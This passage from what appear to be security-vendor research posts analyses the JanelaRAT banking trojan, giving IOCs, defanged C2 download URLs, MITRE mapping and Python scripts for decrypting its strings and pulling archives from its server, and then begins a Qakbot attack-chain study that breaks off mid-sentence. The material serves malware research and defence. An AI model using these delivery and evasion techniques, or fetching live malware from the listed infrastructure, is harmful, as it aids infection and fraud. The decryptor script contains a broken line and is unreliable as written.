Excerpt of JanelaRAT custom implementation of LZ4 compression algorithm The packets system, namely those classes representing packets exchanged by JanelaRAT and the C2 server, was imported from BX RAT. The images below show an example of the Status packet sent by both malware strains to acknowledge the attacker about any activity committed on the infected hosts. Regardless, the two images below show the similarity between the BX RAT packet system (top) and the corresponding code in JanelaRAT (bottom). Figure 14: Example of packet class defined in BX RAT Figure 15: Example of packet class defined in JanelaRAT Differences between JanelaRAT and BX RAT JanelaRAT ships with just a subset of the features offered by BX RAT. The JanelaRAT developer didn't import shell commands execution functionality, or files and processes manipulation functionalities. On the other hand, the JanelaRAT developer invested more energy in developing new capabilities such as the windows titles sensibility mechanism and the dynamic socket configuration mechanism. Based on these observations, we believe that JanelaRAT is being repurposed as a variant of BX RAT to create a new malware strain. Our Findings on JanelaRAT Let's take a look at our findings and what led our team to those conclusions. Malware developer is Portuguese-speaking: As mentioned earlier, all the samples we used in this analysis contain strings in Portuguese. The strings appear in both messages directed to the user (e.g., error messages appearing in popups) and events shipped to the attacker through the C2 channel. Threat actors are targeting banking and financial institutions in LATAM: We found old code indicating that threat actors are targeting financial institutions in LATAM. A particular string caught our attention because it shines light on the attacker's intentions. Like other strings, this one is encrypted and stored as a field of a configuration class. The string is shown, in both its encrypted and decrypted form, in the table below. As you can see, the decrypted string contains multiple references to window titles related to Latin American organizations operating in the banking and decentralized finance verticals. Likely a string containing an older configuration for JanelaRAT Encrypted Form qh7JCRu6U5xLyPrGW510TeZJBdE9sJ1w6ZDiYtlU6xp4x+HCTK53f6HNpbr74MxVlQ/786Lt5lmdyEvbbYEr5yUYC 07Fo9gqDf9B53BAMlKtWBD/oXTmWgWq/cwhtKIkmTERTkxr49oJxl+4MQt5E5oH3CYrF0+ixqhxss3QTkccZE6Kg VeZdK4jJruk26MXH4csG02e0lIGK0HYsJgKOccjSxNOEdqUqZpVRki2W41Q8PMeekqY3i5cEyj+Meq/75bSLmaMI U0h68cT1CxyIvfqaG3NQOlBYDaNW4XT66skZnHkXXy97P+fHVSx/nl/wZDKLGYjiNsvqTP4M48+yo0qt8RGyY5gT ekuDUkm9FYuow+rCxiu0uuS7z1zdgNfJwfctP+VoKU1iKADnQN3OgBSW0pcryYtUAyyl3kPEBZFfg82FJ9qru5UFF AEgSooBVfgCNuN+YwUwnXi2OsBcEaOMaV9f+CSxra8vceXsyrcPC1gD2AT+JGryCu0n21CQ57n6JymD6YyjL/G OEGzpYE06DTt5oHL8HHClxoJU5//P4n6lPnj+wZMq/kyn++vf7de02rHehqrbyGW6jfy/95oviQO759CNctkhpKBvJi9 rroKLOPgwT4LRJC0MNCwD+J8QVomwZIl/SSFivvg6w== Decrypted Form OFF|NAO||8022|BIENVENIDOSALABANCAENLNEABBVAMXICO|BIENVENIDOSA LABANCAENLNEABBVAMXICO|INDEXBBVANET|BBVANETCASH|SANTANDERMXICOSPARTEDELABANCAE LECTRNICA|SANTANDERM|BANCOSANTANDERSGOO|BANCONACIONALDEMXICOCITIBANAMEX|BANCAN ETCITIBANAMEXCOM|BANAMEX|BANORTEELBANCOFUERTEDEMXICO|BANORTEELBANCOFUERTEDEMX ICO|BINANCECORRETORADECRIPTOMOEDASPARABITCOINETHEREUMEALTCOINS|COMPREEVENDABIT COINRAPIDAMENTEPAXFUL|BITSOMSQUEUNEXCHANGEDECRIPTOUNASOLUCINCOMPLETA In addition to the table above, you can infer locations from the first submission on VirusTotal for the VBScript. All the instances we were aware of at the time of analysis were first submitted from LATAM countries. Please see the table below for details: Location of first submission for the VBScript MD5 of the VBScript Country of First Submission 8e7dc7fd611d286ff788ce5583f4d0f7 Mexico cde203b715270f9d948704333630c0ee Mexico 97704646c49406ab2bf5f80164bff55a Mexico be7d1742ac03106e5ae9a4d7b9320fd9 Mexico e9d8743ccfb95b40210d056741c28dc6 Peru 7115d48c7a26ba5dbcbfdad6f2558f8b Colombia 123eebaaa6db5a464fb6dc8bd165e15f Colombia 7ac6d7857b77c27ebb4a1db9a176a86a Colombia Repurposing Remote Access Trojans (RATs): The usage of original or modified commodity Remote Access Trojans (RATs) is common among threat actors operating in the LATAM region. For example, Blind Eagle (aka APT-C-36) recently adopted this technique. You can read about it on TrendMicro or Check Point Research. Abusing DNS services: Using dynamic DNS services to establish C2 channels from malware implants to the attacker's infrastructure is another technique adopted by Blind Eagle. You can read about it on BlackBerry's blog. Conclusion In conclusion, JanelaRAT's focus on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Zscaler Coverage Zscaler sandbox coverage The image below shows the Zscaler cloud sandbox report for JanelaRAT's VBScript downloader. Figure 14: Zscaler sandbox coverage In addition, Zscaler's multilayered cloud security platform detects this campaign at various levels with the following threat names: VBScript.Downloader.JanelaRAT Win32.RAT.JanelaRAT Win64.RAT.JanelaRAT MITRE ATT&CK Mapping ID Technique Name Annotation T1587.001 Develop Capabilities: Malware The attacker repurposed a known malware (BX RAT) to generate a new malware (JanelaRAT) and added a new set of features. T1608.001 Stage Capabilities: Upload Malware The attacker staged compressed archives containing samples of JanelaRAT on the infrastructure. T1059.005 Command and Scripting Interpreter: Visual Basic The attack chain includes the execution of a VBScript responsible for installing JanelaRAT. T1059 Command and Scripting Interpreter The attack chain includes the execution of a batch script responsible for setting up persistence for JanelaRAT. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Persistence is achieved by setting a RunKey. T1574.002 Hijack Execution Flow: DLL Side-Loading JanelaRAT is side-loaded by a legitimate executable delivered by the threat attacker on the infected system. DLL side-loading is used for defense evasion. T1027.002 Obfuscated Files or Information: Software Packing JanelaRAT is protected with a commercial packer called Eazobfuscator. T1140 Deobfuscate/Decode Files or Information JanelaRAT strings are stored and encrypted with AES and encoded in Base64. Furthermore, strings in the VBScript are obfuscated. T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion JanelaRAT goes idle if the last input event occurred more than 10 minutes before the check. T1132.001 Data Encoding: Standard Encoding JanelaRAT encodes information transmitted to the C2 in Base64. T1573.001 Encrypted Channel: Symmetric Cryptography JanelaRAT encrypts information transmitted to the C2 using AES. T1095 Non-Application Layer Protocol JanelaRAT establishes a socket-based C2 channel. T1041 Exfiltration Over C2 Channel JanelaRAT ships screenshots of the compromised system via the C2 channel. Indicators of Compromise (IOCs) MD5 hashes of Stage 1 compressed archives 526a0b2d142567d8078e24ab0758fad7 e841f4691e5107fe360b1528384a96f0 c39f75423862c1525f089a5e966b9d04 72c02b3181c763d0e67f060e91635a97 897e8483b673db70fdc5d3d111600cac c2f4cb0da89b4ea86ab5369a942428eb e56d8632db98b07d2b49423f7dd64b42 8b83e6b2d891cdf9250e9afd17081eab 999a9af2cd20a8c4bcf652e3523aafa3 MD5 hashes of VBScripts 51268b9681df47022c44af43f9d57255 24c6bff8ebfd532f91ebe06dc13637cb 1b72c12db8a37103a37cab5b3b14398c 397e407e63128e71089971e3b35dd253 172ca00d32a201f5e917bc4d73f720a1 505fab6d83ef86a4b12b5808047fa7f1 3870e4a4d86a34424ea47bdaa722cd89 44d9f29a81a2f2df83b6000165e8a06f f71471d7e94ef739a8ee44125023b750 ec60bc4522fa58bfe9592abde33948a7 81618be603bca301ac156ed169444569 ba2bd2d31cf591480b69e106b0e77b5c e2d7101f405ed88aba89bf39d56ee7a8 84919bf0583c0e6c04e606f34a1d56f3 48c189e5dfe28b9d2b32fd813a991adb e684e872213432320c78f56c72c88a8e c86fdacd8af28cb08ef406bc6d4fc5a7 d057c499f440b77cfcad8d859d389915 36a8a7407f084b4ae461b6bb4dd0b65c 900445a57f462d0df130c3612e6caed7 691cc21dae6e320564f74d6372e94286 b1e1134c82fdfe283948930089474574 0cf2707ce1dccd6054813cb9207bf3d4 d1684fa84602a2d560b47dfe0f0779b4 2cbee69042a4d85ecfe6e55639b1b42a da48cd57e4b45cba63716bc2d53c4c76 Download URL for Stage 2 compressed archives http://zimbawhite[.]is-certified[.]com:3001/clientes/[1-44] http://45[.]42[.]160[.]55/ MD5 hashes of Stage 2 compressed archives 897e8483b673db70fdc5d3d111600cac b2aaee6945f75caa1c44bca3e2812993 e166bd80341871c9d752537f80584334 3bbfc1f2e20ba8209d057c215303b2bf 4d62fc39e2586da78b65fff6dc844670 aa3162289e7e848b7aeb19c8b85131fd 1fc6298c88b3ea2030cc0382369d0bb9 999a9af2cd20a8c4bcf652e3523aafa3 42eb945b1b881b2319a74af06b1037db 8ca3dd771adbba82d28ce7ba4a0b8c97 e56d8632db98b07d2b49423f7dd64b42 e841f4691e5107fe360b1528384a96f0 4a1465999cdd9ee687b72289df05eaa9 5335caa5d199eac6f67b2e911b6b1e37 c39f75423862c1525f089a5e966b9d04 e2f9e1dfb24c9deb7f4a3c0c5c1fd016 3ec6342286d5b699bc1fb2ef6598f906 526a0b2d142567d8078e24ab0758fad7 3cbe59c309f803fffdadcc69d3578a53 4c9c287103defb55b9e89278800e4025 7548edc03021561c4d7a1b386aaa7696 596de51352cbeb0d26d861e991889578 18ed52de642d3f3aab7c271804bd005a 5a5106ee07d277b373d13c9f3160fea0 7b70c957449ab51f8d561582f229d5cf 0898c4c1cb698cd29707db44352ab868 5f628223fa083e4598badfe7efae5269 c2f4cb0da89b4ea86ab5369a942428eb 304202cbc70412e76a216257ff4d2085 398d0268535cba57fa3b33159bbe04f3 e6c501b52165cd278724ea229e44a8b9 c625443768b40cfbc93e28b92e874740 c5f2d6d3d3ac3521d2b2f7fa90d3ee5e b036f1351ed5af87005978c7b6036d3d 3a336c5c7bd08587ad1709294d044e41 fc79aa5093f55dfa18a20f538c5e475e 4b142b23110fbb7b98ad49c051d7a1af 76887ccf6de5b5f8d70cd6d91450b131 6364aa555ae8fd0ba5a8d97a2ffa314a 72c02b3181c763d0e67f060e91635a97 8b83e6b2d891cdf9250e9afd17081eab f4a42ef33e3a3a41b4e7ee0cd3173fb6 72f4e0f7ff7a82c1e5cb6480c0c90a00 1a47c3afa06960e8d8f54e507aa23675 JanelaRAT C2 domains JanelaRAT C2 IP addresses MD5 hashes of JanelaRAT DLLs 99bf0fba15aa3a9a59cbf442a80364e5 999a9af2cd20a8c4bcf652e3523aafa3 8b83e6b2d891cdf9250e9afd17081eab e56d8632db98b07d2b49423f7dd64b42 c2f4cb0da89b4ea86ab5369a942428eb 897e8483b673db70fdc5d3d111600cac 72c02b3181c763d0e67f060e91635a97 c39f75423862c1525f089a5e966b9d04 e841f4691e5107fe360b1528384a96f0 526a0b2d142567d8078e24ab0758fad7 Appendix - Python Scripts to Help You Approach JanelaRAT Script for decrypting JanelaRAT strings import base64 import hashlib import sys from Crypto.Cipher import AES def decrypt_string(cyphertext: str, key: bytes) -> str: # handling the cyphertext cypertext_bytes = bytes(cyphertext, "utf-16") cypertext_decoded = base64.b64decode(cypertext_bytes) iv = cypertext_decoded[:16] # configuring the de-cryptor decryptor =, AES.MODE_CBC, iv=iv) # decrypting plaintext_bytes = decryptor.decrypt(cypertext_decoded)[16:] plaintext_decoded = plaintext_bytes.decode("utf-8") # print(plaintext_decoded) plaintext = "".join([c for c in plaintext_decoded if c.isalpha() or c.isnumeric() or c in (".", "|", "-", ":", "/", " ", "_", "{", "}", "?", "=", "@", "&", “#”)]) # plaintext = plaintext_decoded return plaintext def get_key(key: str) -> bytes: key_bytes = bytes(key, "utf-8") key_md5 = hashlib.md5(key_bytes) return key_md5.digest() def main() -> int: args = sys.argv[1:] if len(args) != 2: print("usage: STRINGS_FILE KEY") return -1 path, key = args # handling key key = get_key(key) # decrypting strings with open(path, "r") as sh: for encrypted_string in sh: # print(f">> {encrypted_string}") if len(encrypted_string) <= 16: print(encrypted_string.strip()) else: try: decrypted_string = decrypt_string(encrypted_string, key) print(decrypted_string) except: print(encrypted_string.strip()) if __name__ == "__main__": main() Script to fetch all archives from the C2 server import requests import json import base64 import time def fetchemall(): for i in range(1,45,1): url = "" + str(i) print("fetching archive number %d" %(i)) res = requests.get(url) time.sleep(2) response = res.text j = json.loads(response) enc = j['Body'] dec = base64.b64decode(enc) o_fname = str(i) + ".zip" with open(o_fname, "wb") as f: f.write(dec) return if __name__ == "__main__": fetchemall() Thu, 10 ago 2023 14:02:46 -0700 Gaetano Pellegrino Hibernating Qakbot: A Comprehensive Study and In-depth Campaign Analysis Introduction In the ever-evolving landscape of cyber threats, banking trojans continue to pose a significant risk to organizations worldwide. Among them, Qakbot, also known as QBot or Pinkslipbot, stands out as a highly sophisticated and persistent malware active since 2007, targeting businesses across different countries. With a primary focus on stealing financial data and login credentials from web browsers, Qakbot also serves as a backdoor to inject next-stage payloads like Cobalt Strike and ransomware. Its adaptability, evasive techniques, and global reach have made it a formidable adversary for cybersecurity professionals seeking to defend against its malicious activities. As part of our commitment to monitoring active malware campaigns, Zscaler's ThreatLabz team conducts in-depth investigations to uncover the various attack chains employed by Qakbot. In this research article, we delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods. We explore its use of diverse file formats, encryption techniques, and attack chains to evade detection and maintain its foothold in infected systems. Our examination also uncovers patterns in its Command and Control (C2) infrastructure and provides valuable insights into its geographic distribution. Recent campaigns have revealed Qakbot's adaptation to changing conditions. In January 2023, after Microsoft disabled Macros by default in all Office applications, Qakbot began abusing OneNote files as a means of spreading itself. For detailed insights into these campaigns and obfuscation techniques, readers can refer to Zscaler ThreatLabz's research blog on OneNote. With the use of Zscaler Sandbox, we shed light on the threat scores and specific MITRE ATT&CK techniques triggered by Qakbot during our investigation. Armed with this knowledge, cybersecurity professionals can better equip themselves to counter this persistent malware and protect their networks from its malicious campaigns. Interestingly, we observed a significant decline in Qakbot activity after June, indicating a potential pause in the threat actor's operations. It appears that the group behind Qakbot has temporarily reduced its activities, which could indicate various factors at play. Throughout this article, we delve into the intricacies of Qakbot's attack chains, encryption methods, and its wide geographical reach. Our ultimate goal is to empower cybersecurity professionals to better defend against this sophisticated and persistent banking trojan. By fostering collaboration within the cybersecurity community and staying vigilant in monitoring emerging threats, we aim to collectively enhance the security posture of organizations worldwide and preserve the trust of users and businesses alike. Key Takeaways 1. Qakbot - A Persistent Banking Trojan: Qakbot, also known as QBot or Pinkslipbot, has been an active and persistent banking trojan since 2007. It continues to evolve over time, utilizing different techniques to infect users and compromise systems. Qakbot employs diverse attack chains, multiple file formats, and obfuscation methods to avoid detection from antivirus solutions and maintain its foothold in infected systems. 2. OneNote Campaign and Ongoing Activity: Following the OneNote campaign, Qakbot remains highly active, distributing its payload through various attack chains. Despite security measures and patches aimed at mitigating Qakbot's attacks, the threat actors continue to find novel ways to deliver their payload and exploit vulnerable Windows file formats. The malware employs different abusable file formats, including pdf, html, xhtml (eXtended HTML), wsf (Windows Script File), js (Javascript), ps (Powershell), xll (Excel add-in), hta (HTML Application), xmlhttp, etc., in its attack chain to infect users. 3. Global Reach and C2 Infrastructure: The analysis reveals Qakbot's wide geographic distribution, with C2 servers highly active in various countries. This highlights the malware's global reach and capability to target organizations worldwide. 4. Decline in Qakbot Activity: After observing a significant drop in Qakbot activity after June, it appears that the threat actor behind Qakbot has temporarily reduced its operations. The reasons for this decline remain unclear. 5. Collective Defense and Vigilance: Collaboration within the cybersecurity community, proactive monitoring, and adherence to best practices are crucial to effectively counter Qakbot's relentless pursuit. Strengthening security protocols and conducting security awareness training are essential in safeguarding against banking trojans like Qakbot and preserving the integrity of networks and sensitive data. Analysis Of Qakbot Attack Chains This section presents distinct variations of the Qakbot banking trojan attack chain, examined across samples discovered between March and May of 2023. The case studies below specifically concentrate on how diverse file formats and techniques execute the Qakbot end payload on the victim's machine, instead of directly dropping and executing the malware. Case Study 1: March 2023 - Evolving Qakbot Tactics: Exploiting File Formats for Deceptive Payload Delivery At the outset of the year, Qakbot began spreading through OneNote files. Subsequently, in March, a shift was observed, as Qakbot transitioned to using PDF and HTML files as the initial attacking vectors to download further stage files, leading to the delivery of the final payload. These file formats are commonly utilized by numerous threat actors to infect users. Multiple attack chains were observed, wherein Qakbot utilizes PDF files as the initial vector to download the next stage file, which contains an obfuscated JS (Javascript) file bearing names like "Invoice," "Attach," "Report," or "Attachments" to deceive users into executing the file. Upon running the JS file, Qakbot initially creates a registry key and adds the base64 encoded Powershell command into the registry key using the reg.exe command line tool, enabling the download and execution of the Qakbot DLL. Attack Chain: MalSpam -> PDF -> URL -> JS -> PS -> Qakbot Payload Figure 1 - Illustrates the attack chain involving a Malicious PDF as the initial attack vector. Qakbot recently reverted to utilizing HTML smuggling as a means of delivering its initial attack payload. This technique was observed across numerous campaigns during the previous year. In March, the identification of several new malspam emails indicated that threat actors were leveraging Latin-themed HTML files to facilitate the download of zip archives. These archives contained an obfuscated JS file, initiating a sequence similar to the one depicted in Fig.1, ultimately leading to the delivery of the Qakbot payload. The attack chain discovered in March follows the following progression: Malspam -> HTML -> URL -> ZIP -> JS -> PS -> Qakbot Payload In this chain, malspam serves as the initial delivery method, targeting unsuspecting victims through deceptive emails. The HTML files play a pivotal role in exploiting HTML smuggling techniques, concealing malicious activities within seemingly innocuous web content. Upon accessing the HTML files, URLs are triggered, initiating the download of zip archives containing the obfuscated JS file. The use of obfuscation ensures that the malicious code remains hidden from casual detection and analysis, enhancing the threat actors' ability to evade detection. Subsequently, the JS file is executed, setting off a series of actions that culminate in the execution of a Powershell command (PS). The Powershell command is instrumental in obtaining and executing the final payload, which, in this case, is the notorious Qakbot banking trojan. During our campaign follow up we found this sample from Twitter handle @Pr0xylife and @Cryptolaemus1. This resurgence of HTML smuggling by Qakbot highlights the significance of continuous monitoring and awareness of evolving malware tactics and shifting attack chains for detecting and countering such threats. Figure 2 - Shows the attack chain with a Malicious HTML file as the initial attack vector. Later, a similar attack chain was identified, where the initial attack vector involved a PDF file. This PDF file was designed to download a zip archive, which, in turn, contained an obfuscated WSF/HTA file. Upon execution, the WSF/HTA file ran a base64 encoded Powershell command, leading to the download and execution of the final Qakbot payload. The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF/HTA -> PS -> Qakbot Payload In this scenario, malspam continues to serve as the initial method of propagation, disseminating malicious content through email campaigns. The PDF file, acting as the attack vector, entices users to access its contents, ultimately triggering the download of a zip archive. Inside the zip archive, an obfuscated WSF/HTA file is concealed, obscuring its malicious intent and complicating detection efforts. Once executed, the WSF/HTA file initiates a base64 encoded Powershell command, a common technique used by threat actors to download and execute further payloads without leaving a conspicuous trail. The culmination of this attack chain results in the delivery and execution of the Qakbot banking trojan against the targeted system and its users. Figure 3 - Features a Malicious PDF as the initial attack vector in the attack chain, accompanied by WSF and HTA files. In another discovery made by ThreatLabz researchers, a variant of the Qakbot malware was observed employing a stealthy attack chain with the use of Microsoft Excel add-ins (XLL) as the initial vector. Microsoft Office add-ins are DLL files with distinct extensions based on the application they are designed for. While Microsoft Word add-ins use the '.wll' extension, Excel add-ins utilize the '.xll' extension. The choice of using XLL files as the initial attacking vector is strategic for threat actors due to their ease of use. Unlike Word add-ins that must be placed in specific trusted locations depending on the Office version, XLL files are automatically loaded and opened by the Excel application, simplifying the delivery process for the attackers. Moreover, XLL files possess unique characteristics that differentiate them from regular DLLs. They can have export functions that are invoked by the Excel Add-In manager when triggered by Excel. Upon launching an XLL file, Excel activates the export functions defined by the XLL interface, such as xlAutoOpen and xlAutoClose, similar to Auto_Open and Auto_Close in VBA macros. This mechanism is exploited by the attackers to load the malicious payload seamlessly, evading security measures and detection. The attack chain follows a sequence where the threat actor utilizes a .xll file in the initial phase. When a user opens this .xll file, it proceeds to drop two files, "1.dat" and "2.dat," into the '\Users\User\AppData\Roaming\' directory. The "1.dat" file contains a 400-byte header of the PE file, while the "2.dat" file holds the remaining data of the PE file. These two files are then combined to create the "3.dat" file, which contains the actual Qakbot payload. Additionally, the attackers establish scheduled tasks to execute the Qakbot payload every 10 minutes, ensuring its persistence on the victim's machine. The observed attack chain follows the following progression: Malspam -> ZIP -> XLL > Qakbot Payload This attack chain sample underscores the ever-evolving nature of Qakbot, which continuously adapts its tactics and techniques to avoid detection and infiltrate systems. By utilizing XLL files and implementing sophisticated techniques to hide and deliver its payload, Qakbot continues to pose a significant threat to users and organizations. Figure 4 - Shows the attack chain involving Malicious XLL files as the initial attack vector. Case Study 2: April 2023 - Adapting Qakbot: Unraveling the XMLHTTP Experiment in the Attack Chain In April, researchers noted more significant changes in the Qakbot attack chain, as the samples revealed the malware continued to experiment with different file formats to infect users. In this evolved attack chain, the WSF (Windows Script File) contains a hex-encoded XMLHTTP request to download the Qakbot payload, replacing the previous base64 encoded PowerShell command. The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF -> XMLHTTP -> Qakbot Payload Figure 5 - Depicts the attack chain utilizing the XMLHTTP file. Towards the end of April, Qakbot's persistent use of OneNote files as the initial attack vector was still evident in its latest campaign. OneNote files served as an effective disguise, luring unsuspecting users into opening and executing the embedded contents. The attackers leveraged the familiarity and widespread use of OneNote files to increase the chances of successful infections. Within this attack chain, the OneNote file contains an embedded MSI (Microsoft Installer) file. This MSI file was designed to trick users by posing as a legitimate Microsoft Azure installer, exploiting victims' trust in these familiar software installations and delivering the Qakbot payload. The MSI file was purposely crafted to include several components, enhancing its evasive capabilities and making it difficult for security systems to detect its true intent. Among these components, a self-deletion PowerShell script was incorporated, allowing the malware to erase its tracks after execution, reducing the chances of detection and analysis. Furthermore, the MSI file contained a configuration file that held essential information, including the path to execute a WSF (Windows Script File) script. This WSF script served as a critical link in the attack chain, acting as an intermediary to facilitate the download and execution of the Qakbot payload. To ensure further obfuscation and evasion, the WSF script was hex-encoded, making it challenging for traditional security measures to interpret its true purpose. This encoded script was responsible for executing an XMLHTTP request, a technique used to download the actual Qakbot payload from a remote server. Through this intricate sequence of deception and evasion, attackers aim to successfully deliver the Qakbot payload onto victim machines. By continuously adapting their attack techniques and leveraging familiar file formats, the threat actors behind Qakbot seek to stay one step ahead of security defenses and professionals. The observed attack chain follows the following progression: Malspam -> OneNote -> MSI -> WSF -> XMLHTTP -> Qakbot Payload Figure 6 - Evolving Attack Chain: Leveraging Malicious OneNote and MSI Files as Initial Attack Vector. Case Study 3: May 2023: Qakbot Explores Advanced Defense Evasion Tactics Throughout the month of May, researchers closely monitored Qakbot's activities and observed the threat actor's efforts to experiment with innovative Defense Evasion Tactics aimed at infecting users and evading detection. Alongside changes in the attack chain, Qakbot introduced sophisticated techniques, including Indirect Command Execution using conhost.exe and DLL Side-Loading, further complicating its detection and removal. In this attack chain, Qakbot takes advantage of conhost.exe as a proxy binary to bypass defensive measures. By employing conhost.exe, Qakbot attempts to outwit security counter-measures that restrict the use of typical command-line interpreters. This enables the threat actor to execute commands using various Windows utilities, creating a clever diversion and making it more challenging for security tools to identify and mitigate the threat effectively. The attack sequence starts with malspam, where malicious emails are distributed to unsuspecting victims. These emails often contain malicious attachments disguised as innocent files, luring users into opening them. The threat actors use PDF files packed within ZIP archives, which, when accessed, lead to the execution of WSF files via XMLHTTP. To further obscure its activities, Qakbot then leverages conhost.exe, employing it as an intermediary to carry out specific commands. This tactic is part of Qakbot's strategy to operate stealthily within the compromised system, remaining undetected by conventional security mechanisms that may primarily focus on detecting direct malicious code execution. The ultimate goal of this attack chain is to deliver the Qakbot payload, allowing the malware to infiltrate the victim's system, steal sensitive information, and potentially carry out other malicious activities, including espionage and financial theft. The observed attack chain follows the following progression: Malspam -> PDF -> ZIP -> WSF -> XMLHTTP -> conhost.exe -> Qakbot Payload Figure 7 - Demonstrates Qakbot's utilization of Indirect Command Execution with conhost.exe. In this intricate attack chain, the initial vector is a ZIP file that conceals an executable (EXE) file. Upon execution, the EXE file loads a hidden dynamic-link library (DLL) that employs a curl command to download the final Qakbot payload. This attack chain also involves the use of DLL side loading technique, adding another layer of complexity to the attack. The threat actor initiates this attack through malspam, sending deceptive emails containing URLs that lead to the delivery of the ZIP file. Once the user accesses the ZIP file and executes the embedded EXE file, the attack unfolds, triggering the loading of the concealed DLL. This DLL utilizes a curl command to download the final Qakbot payload from a remote server. By incorporating DLL side loading, the threat actor creates a diversion, making it more challenging for security measures to detect the malicious activities. This advanced technique allows the malware to execute code indirectly and evade traditional detection mechanisms, adding an extra layer of sophistication to the attack. The attack sequence follows: Malspam -> URL -> ZIP -> EXE -> DLL -> CURL -> Qakbot Payload Figure 8 - Depicts Qakbot's utilization of DLL Side Loading in its attack chain. On May 17th, several Pikabot samples were distributed using tactics, techniques, and procedures (TTPs) similar to those of Qakbot within the Zscaler Cloud. This discovery is valuable as it highlights a potential link or copycat scenario and provides insights into Pikabot malware behavior and distribution methods. The resemblance between Pikabot and Qakbot, including similarities in their behavior and internal campaign identifiers, suggests a possible connection between the two. However, there is not yet sufficient evidence to definitively link these malware families to the same threat actor. Understanding the similarities and differences between Pikabot and Qakbot is critical for cybersecurity professionals to effectively respond to these threats. The identification of new malware variants helps security teams stay ahead of evolving attack trends, enabling them to adjust their defense strategies accordingly. By closely monitoring the behavior and distribution patterns of these malware families, security experts can enhance their threat intelligence and improve their ability to detect and mitigate such attacks in the future. Threatlabz's ongoing technical analysis of Pikabot will provide further insights into its capabilities and potential impact on organizations. Keeping abreast of such developments and conducting thorough examinations of new malware variants is crucial for safeguarding networks, systems, and sensitive data from cyber threats. As the investigation progresses, security professionals can better assess the potential risks posed by Pikabot and formulate effective mitigation measures to protect against its infiltration and harmful activities. Figure 9 - Shows the distribution of Pikabot, discovered in Zscaler Cloud. Technical Analysis Summary The analysis of various Qakbot campaigns revealed that despite different campaign strategies, all Qakbot samples retained a consistent core. Notably, the threat actor used different compilers in each campaign, resulting in changes to the binary's opcodes while maintaining the same depack algorithm. This technique aims to evade static detection mechanisms like YARA, making it more challenging for security analysts to identify and mitigate the malware. Following execution, the Qakbot malware checks if it is running under the Windows Defender Sandbox environment using the GetFileAttributeW() function. Specifically, it searches for the presence of any directory named "C:\INTERNAL\__empty," and if detected, Qakbot terminates itself. This behavior showcases the malware's efforts to evade analysis within sandboxed environments and highlights its sophistication. Figure 10 - Verification of Windows Defender Sandbox execution. Additionally, the unpacking of the Qakbot malware is relatively straightforward, utilizing the VirtualAlloc() API to allocate memory space and execute itself. The unpacked payload reveals two different components within the Bitmap section: COMPONENT_07 and COMPONENT_08. COMPONENT_07 contains the encrypted campaign ID, while COMPONENT_08 contains the encrypted Qakbot command-and-control server (C2) configurations. Qakbot samples tend to use the following resources: Bitmap RCData Figure 11 - Component_07: Encrypted Campaign ID. The screenshot in Figure 11 shows the encrypted content of Component_07, which appears to contain the campaign ID used by Qakbot. This encrypted data is a crucial part of the malware's internal campaign identification process, and decrypting it may provide valuable insights into the threat actor's campaigns and targeting strategies. Figure 12 - Component_08: Encrypted QakBot C2 configuration. The screenshot in Figure 12 shows the encrypted content of Component_08, which appears to hold the encrypted QakBot command-and-control (C2) server configuration information. Decrypting this component may reveal critical information about the communication channels and C2 infrastructure utilized by the QakBot malware and provide essential insights into the threat actor's operations. Of note, Qakbot employs XOR encryption with two different offsets to encrypt significant strings. The encrypted data is strategically placed in the .DATA section of the unpacked payload binary file, enhancing its concealment and making it more challenging for analysts to interpret the content. The decryption loop relies on a separator byte as the termination condition, adding flexibility to the decryption process. Figure 13 -Shows the encoded strings residing in the .DATA section of the Qakbot malware. The use of encoding techniques in this section adds an extra layer of obfuscation. The decrypted strings contain critical information about Qakbot's anti-AV functionality and other malicious activities it performs. These decoded strings offer insights into the malware's behavior, showcasing the various techniques employed to avoid detection and hamper analysis efforts. Figure 14 - Depicts the decrypted strings, along with the next stage decryption key. These decrypted strings contain valuable information regarding Qakbot's functionalities and internal operations. The next stage decryption key is a critical component that leads to the unraveling of additional layers of encryption and provides insights into Qakbot's intricate behavior. Figure 15 - Decrypted strings contain Anti-AV and Anti-Analysis strings. The SHA-1 of the hardcoded key recovered from the .DATA section remains static across different campaigns, and it serves as the RC4 key to decrypt encoded data in the resource section. Additionally, the SHA-1 is used for validation purposes to ensure the accuracy of the decryption process. Figure 16 - SHA-1 hash of encrypted key. Moreover, Qakbot uses SHA-1 validation to decrypt the encoded configuration present in the resource section of the unpacked binary. The decrypted configuration contains critical information such as new RC4 keys and Qakbot campaign IDs. Fig.17 - SHA-1 validation + New RC4 Key + Qakbot Campaign ID The SHA-1 validation of the New RC4 key and the Encrypted Configuration matches with the first 20 bytes obtained from the decrypted data in the previous step (Figure 17). Figure 18 - SHA-1 validation. The first 20 bytes in the data represent the SHA-1 validation, a cryptographic process used for data integrity verification. These bytes serve as a hash value that allows systems to confirm the authenticity and integrity of the data being processed. Following the SHA-1 validation, the subsequent 20 to 40 bytes are indicative of the new encryption key. Encryption keys are essential in securing data and ensuring that only desired parties can access and interpret the encrypted information. Beyond the 40th position in the data, we encounter the encrypted configurations. These configurations likely contain critical instructions, settings, or data that the malware utilizes during its execution and malicious activities. This data structure encompasses essential components of the Qakbot malware's operation, encompassing validation, encryption, and critical configurations necessary for executing its malicious objectives. Figure 19 - Qakbot CampaignID. Following the initial RC4 decryption process, the second round of RC4 decryption occurs on Component_08, as shown in Figure 12 of the resource section. Component_08 is the encrypted section that likely contains the Qakbot command-and-control (C2) server configuration. Conducting the second RC4 decryption on this component may unveil critical information about the communication channels, domains, or IP addresses used by the malware to establish communication with its C2 infrastructure. Analyzing this decrypted data is essential in understanding the command and control infrastructure of Qakbot. Figure 20 - SHA-1 hash validation, new RC4 key, Qakbot C2 configuration. With the application of the new RC4 key, the decryption process enables access to the command-and-control (C2) configuration of the Qakbot malware. The decrypted configuration data is presented in hexadecimal format, with a starting separator value of "01". The subsequent four bytes are converted into decimal values byte by byte, followed by an additional two bytes that indicate the ports used to establish connections to the C2 servers. Figure 21 - Qakbot's decrypted 